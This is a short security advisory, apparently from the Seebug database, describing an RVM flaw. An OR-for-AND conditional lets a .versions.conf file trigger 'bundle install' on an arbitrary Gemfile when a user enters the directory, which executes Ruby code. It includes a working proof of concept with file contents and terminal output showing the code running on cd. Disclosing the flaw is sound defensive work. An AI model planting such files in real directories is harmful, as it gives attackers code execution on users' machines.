RVM automatically does "bundle install" on a Gemfile specified by .versions.conf in $PWD

2017-02-16T00:00:00
ID SSV:92690
Type seebug
Reporter Root
Modified 2017-02-16T00:00:00

Description

RVM, by default, hooks cd and automatically parses a file named .versions.conf in the directory being changed to. The intention seems to be that, if the user's ${rvm_autoinstall_bundler_flag} setting is enabled, then .versions.conf can specify a Gemfile that will automatically be fed to bundle install. Due to an erroneous conditional that uses || (OR) instead of && (AND), .versions.conf can provide the name of an arbitrary Gemfile that will automatically be fed to bundle install regardless of the state of ${rvm_autoinstall_bundler_flag}. The code responsible, as of a vulnerable commit, is available at <https://github.com/rvm/rvm/blob/b04c0158dbadc9a999a2af4f39bc008976b9ebf1/scripts/functions/rvmrc_project#L102-L113>.

This behaviour can be used to achieve immediate ruby code execution upon cd into a malicious directory since Gemfiles are interpreted using Ruby <https://github.com/bundler/bundler/issues/5178>

POC

```text rvm@e6aeaf6d79ec:~$ mkdir poc

rvm@e6aeaf6d79ec:~$ cat > poc/.versions.conf ruby=ruby-2.3.0 ruby-bundle-install=.doot ^D

rvm@e6aeaf6d79ec:~$ cat > poc/.doot echo "Arbitrary ruby code execution as $(id)" &gt;&2 ^D

rvm@e6aeaf6d79ec:~$ cd poc installing gem bundler --no-ri --no-rdoc. Arbitrary ruby code execution as uid=1000(rvm) gid=1000(rvm) groups=1000(rvm) The Gemfile specifies no dependencies Resolving dependencies... Bundle complete! 0 Gemfile dependencies, 1 gem now installed. Use bundle show [gemname] to see where a bundled gem is installed. ```